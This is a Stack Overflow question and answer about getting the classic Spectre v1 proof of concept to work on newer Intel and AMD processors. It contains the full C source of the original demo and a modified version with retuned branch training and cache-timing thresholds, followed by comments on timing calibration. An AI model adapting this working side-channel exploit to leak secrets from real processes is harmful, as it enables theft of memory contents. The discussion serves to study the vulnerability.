Example of Spectre v1 on new CPU

Question

I know how Specter works, I found a program on GitHub that demonstrates how it works. but on my computers win 10 21h2 (i5-11400F, i5-9600K, R7-5800hs) it does not work, it only gives questions, but on i5-7500U it works also in win 10. I know that there were patches and fixes after 2018, but they all protect against access to other programs, in this case the data that the specter receives was created by the same program and therefore the protection should not affect the result. questions:

can this program work on new processors?
what are its parameters responsible for (why are arrays of such sizes taken)?

Code from GitHub:

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt", on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

/********************************************************************
Victim code.
********************************************************************/
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = {
        1,
        2,
        3,
        4,
        5,
        6,
        7,
        8,
        9,
        10,
        11,
        12,
        13,
        14,
        15,
        16
};
uint8_t unused2[64];
uint8_t array2[256 * 512];

char * secret = "The Magic Words are Squeamish Ossifrage.";

uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */

void victim_function(size_t x) {
    if (x < array1_size) {
        temp &= array2[array1[x] * 512];
    }
}

/********************************************************************
Analysis code
********************************************************************/
#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */

/* Report best guess in value[0] and runner-up in value[1] */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {
    static int results[256];
    int tries, i, j, k, mix_i, junk = 0;
    size_t training_x, x;
    uint64_t time1, time2;
    volatile uint8_t * addr;

    for (i = 0; i < 256; i++)
        results[i] = 0;
    for (tries = 999; tries > 0; tries--) {

        /* Flush array2[256*(0..255)] from cache */
        for (i = 0; i < 256; i++)
            _mm_clflush( & array2[i * 512]); /* intrinsic for clflush instruction */

        /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
        training_x = tries % array1_size;
        for (j = 29; j >= 0; j--) {
            _mm_clflush( & array1_size);
            for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */

            /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
            /* Avoid jumps in case those tip off the branch predictor */
            x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
            x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
            x = training_x ^ (x & (malicious_x ^ training_x));

            /* Call the victim! */
            victim_function(x);

        }

        /* Time reads. Order is lightly mixed up to prevent stride prediction */
        for (i = 0; i < 256; i++) {
            mix_i = ((i * 167) + 13) & 255;
            addr = & array2[mix_i * 512];
            time1 = __rdtsc(); /* READ TIMER */
            junk = * addr; /* MEMORY ACCESS TO TIME */
            time2 = __rdtsc() - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
            if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
                results[mix_i]++; /* cache hit - add +1 to score for this value */
        }

        /* Locate highest & second-highest results tallies in j/k */
        j = k = -1;
        for (i = 0; i < 256; i++) {
            if (j < 0 || results[i] >= results[j]) {
                k = j;
                j = i;
            } else if (k < 0 || results[i] >= results[k]) {
                k = i;
            }
        }
        if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
            break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
    }
    results[0] ^= junk; /* use junk so code above won’t get optimized out*/
    value[0] = (uint8_t) j;
    score[0] = results[j];
    value[1] = (uint8_t) k;
    score[1] = results[k];
}

int main(int argc,
         const char * * argv) {
    size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */
    int i, score[2], len = 40;
    uint8_t value[2];

    for (i = 0; i < sizeof(array2); i++)
        array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
    if (argc == 3) {
        sscanf(argv[1], "%p", (void * * )( & malicious_x));
        malicious_x -= (size_t) array1; /* Convert input value into a pointer */
        sscanf(argv[2], "%d", & len);
    }

    printf("Reading %d bytes:\n", len);
    while (--len >= 0) {
        printf("Reading at malicious_x = %p... ", (void * ) malicious_x);
        readMemoryByte(malicious_x++, value, score);
        printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
        printf("0x%02X=’%c’ score=%d ", value[0], (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
        if (score[1] > 0)
            printf("(second best: 0x%02X score=%d)", value[1], score[1]);
        printf("\n");
    }
    return (0);
}

Rocket Lake was released in March 2021, don't expect it to have flaws identified in 2018. — Hans Passant, Jan 21 '22 at 14:32
@HansPassant you mean this program can't work on new cpu 10gen 11gen? i know that this program work on 7 and 7 gen Intel core. — taburetca, Jan 21 '22 at 14:54
@stark Why not? These functions are perfectly fine to use from C++. — fuz, Jan 21 '22 at 15:38
@taburetca The program demonstrates a defect in some x86 processors. This defect has been fixed in your processor. — fuz, Jan 21 '22 at 15:38
@fuz: The interesting question is how it could be fixed / mitigated. There's no call across a privilege boundary here; the "victim" function is part of the same process, and it's using the same `array2` as the attacking code. (Not just some other virtual address that aliases it.) Is this evidence that Rocket Lake invalidates cache lines when discarding cache-miss loads while recovering from a branch miss? Or is this evidence that a different compiler on a different machine did something different, e.g. reordering the load relative to those `__rdtsc()` calls without `lfence`? — Peter Cordes, Jan 21 '22 at 19:19
Or is this just an effect of the larger / more associative L1d cache in Rocket Lake (48k 12-way up from 32k 8-way), or different / better branch prediction? Or maybe the `CACHE_HIT_THRESHOLD (80)` default is a bad heuristic? The TSC reference frequency is a lot different from the core frequency in Ice Lake (and presumably Rocket Lake), unlike in early Intel where it was about equal to the reference frequency. (e.g. 4008 MHz on my 4.0 GHz Skylake i7-6700k. But i5-1035 Ice Lake, TSC = 1.5 GHz, non-turbo base = 1.1 GHz) — Peter Cordes, Jan 21 '22 at 19:21
Hmm, the querent's i5-9600K is "only" Coffee Lake, same microarchitecture as i5-7500U Kaby Lake. Coffee Lake may have done some things to mitigate Meltdown and/or Spectre, but my guesses about different branch prediction, cache, or RDTSC seem unlikely there. — Peter Cordes, Jan 21 '22 at 19:28

taburetca · Answer 1 · 2022-01-23T03:25:07.107

The Specter vulnerability works also on new processors, all protections are aimed at preventing the receipt of data from other programs, but this example will work everywhere, since everything is in one program, I don’t get much into operating systems, but it is possible if the attacking program launches the program inside itself victim, then it will be possible to obtain data from the program of the victim.

Changes: I removed the excess that I considered unnecessary for the program to work, Score. I also redid the predictor training, it seems to me that in the program that was in question, the new processors predicted the cycle and optimized it, I decided to use rand so that such optimization was not possible, I did the same in the section for reading data from the cache. I also removed the

 if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0)) 
   break;

it was needed to speed up the program, but its second part seemed to me not quite right, in the end I removed it altogether, since the program already works fast enough. Well, I changed the way of setting the input data and the output data options.

#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> // работа с кэшем win
#else
#include <x86intrin.h> //работа с кэшем
#endif
const unsigned int Time_To_Cashe = 160;
unsigned int array1_size = 5;
uint8_t trash[5] = { 1, 2, 3, 4, 5};// мусор для тренировок
uint8_t array2[256 * 512];
uint8_t temp;

void victim_function(size_t x) {//а вот и сам спектр 
  if (x < array1_size) {
    temp = array2[trash[x] * 512];
  }
}

uint8_t readMemoryByte(int cache_hit_threshold, size_t attack_x) {
  int results[256] = {0};
  int tries, i, max, sim;
  size_t train_x, x;
  register uint64_t Start, Time;
  volatile uint8_t *rd;

  for (tries = 500; tries > 0; tries--) { 
    for (i = 0; i < 256; i++)
      _mm_clflush( & array2[i * 512]); //удаляем из кэша array2
    /* тренирум 3 раза, на 4й атакуем, повторяем 6 раз*/
    train_x = tries % array1_size;
    for (int j = 31; j >= 0; j--) {
      _mm_clflush(&array1_size);
      x = ((rand() + 1) * (j % 4)) % 4 - 1;
      x = train_x ^ (x & (attack_x ^ train_x));// при i % 4 == 0 атакуем 
      victim_function(x);
    }
    for (i = 0; i < 256; i++) {
      sim = rand() % 256; // считываем рандомно, чтобы процессор не смог оптимизировать код,
      //ничего страшного если чтото мы прочтем несколько раз или не прочтем, из-за большого tries мы в любом случаее прочтем все 
      rd = & array2[sim * 512];

      Start = __rdtscp(rd); // замеряем время доступа
      int tmp = *rd; //обновляем addr
      Time = __rdtscp(rd) - Start;
      if ((int)Time <= cache_hit_threshold && sim != trash[train_x]) // определяем где находятся данные в кэше ил в ОЗУ
        results[sim]++; //увеличиваем встречаемость символа
    }

    max = -1;
    for (i = 0; i < 256; i++) {
      if (max < 0 || results[i] >= results[max]) {
        max = i;
      }
    }
  }
  return max;//возвращаем символ с макс частотой
}

inline void print(char c, FILE *out) {
  if (out == NULL) {
    printf("%c", c);
  }
  else {
    fprintf(out, "%c", c);
  }
}

int main(int argc, char **argv) {
  int cache_hit_threshold = Time_To_Cashe;
  const char* secret = argv[1];
  size_t malicious_x = (size_t)(secret - (char * ) trash);
  int len = strlen(secret);
  FILE* out = NULL;
  if (argc == 3) {
    out = fopen(argv[2], "w");
  }
  for (int i = 0; i < (int)sizeof(array2); i++) {
    array2[i] = 1; // заполняем 1ми, чтобы в озу не было 0
  }
   
  while (--len >= 0) {//считываем попорядку, по 1 букве
    int tmp = readMemoryByte(cache_hit_threshold, malicious_x++);
    print(tmp, out);
  }
  if (out != NULL) {
    fclose(out);
  }
  return 0;
}

I can be wrong in a lot of places, so correct me if I lied or made a mistake somewhere.

CACHE_HIT_THRESHOLD 160 is the best, because even at a very low cache frequency everything works, but of course it also depends on your RAM, CPU and individually, but on my 3 PCs everything works — taburetca, Jan 22 '22 at 16:22
What makes the code in this answer work where the code in the question didn't? You should describe in words what the important changes were. Was it `Time_To_Cashe = 160` instead of 80? (That's a spelling error, BTW. The English word is "[cache](https://en.wikipedia.org/wiki/CPU_cache)", pronounced the same as "[cash](https://en.wiktionary.org/wiki/cash#Pronunciation)" but with a separate meaning). — Peter Cordes, Jan 22 '22 at 20:15
@PeterCordes thanks, I added a description of the changes, later I will add a little more, translate the comments. As you can see, my native language is Russian and I don't know English very well). — taburetca, Jan 23 '22 at 03:41
@PeterCordes about Time_To_Cache account, so this is a parameter that desirable to replace with a function that measures the cache access time. But I dont know how. Personally, the program from the question didt work for me, for any values of Time_To_Cache, at the moment I have 160, I decided to make tests (i5-9600k) when cache work on very low frequency (0.8Ghz), and the RAM work on high frequency, and with minimal delays (40ns) in such cases, the value 80 was not enough for program to work, and the value 160 turned out to be universal (Personally in my case) — taburetca, Jan 23 '22 at 03:42
The cache works at the same frequency as the CPU. But you're always measuring in reference cycles, not core clock cycles anyway, because you're using RDTSC (not RDPMC after making system calls to set up perf counters). So the question becomes, how does the reference frequency compare to RAM. Since cache-miss latency is approximately the same number of nanoseconds independent of CPU frequency, you could maybe calibrate by timing wall-clock and RDTSC for some interval (100 microseconds or something, maybe spinning on a call to a high-precision time function) and dividing. — Peter Cordes, Jan 23 '22 at 03:47
(Intel server CPUs (Xeon) can run their cache independently of the cores, with each core clocked separately. But I think Intel client chips tie the uncore (L3 / ring bus) clock to the core clock. And all cores share the same clock in Intel client CPUs, other than being halted or not for power-save states.) — Peter Cordes, Jan 23 '22 at 03:49
Let us [continue this discussion in chat](https://chat.stackoverflow.com/rooms/241317/discussion-between-taburetca-and-peter-cordes). — taburetca, Jan 23 '22 at 04:01
@PeterCordes, well, I lowered the frequency of the ring bus, doesn't it connect the cores to each other and the cache to each other? I actually did not understand wich cache i use in program, all or L1+L2 or L1 — taburetca, Jan 23 '22 at 04:02
@PeterCordes, I didn’t understand what you are talking about in your message about replacing Time_To_Cache, there are many words that I don’t know, but the translator turns out to be nonsense. can you write this piece of code? — taburetca, Jan 23 '22 at 04:07

Example of Spectre v1 on new CPU

1 Answers1